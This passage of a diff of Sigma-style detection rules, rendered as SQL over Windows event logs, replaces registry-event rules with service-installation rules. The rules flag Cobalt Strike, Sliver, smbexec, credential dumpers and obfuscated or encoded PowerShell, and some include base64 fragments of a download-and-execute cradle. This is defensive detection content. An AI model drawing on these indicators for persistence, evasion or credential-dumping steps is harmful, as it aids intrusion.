(Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ "attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND NewValue LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + 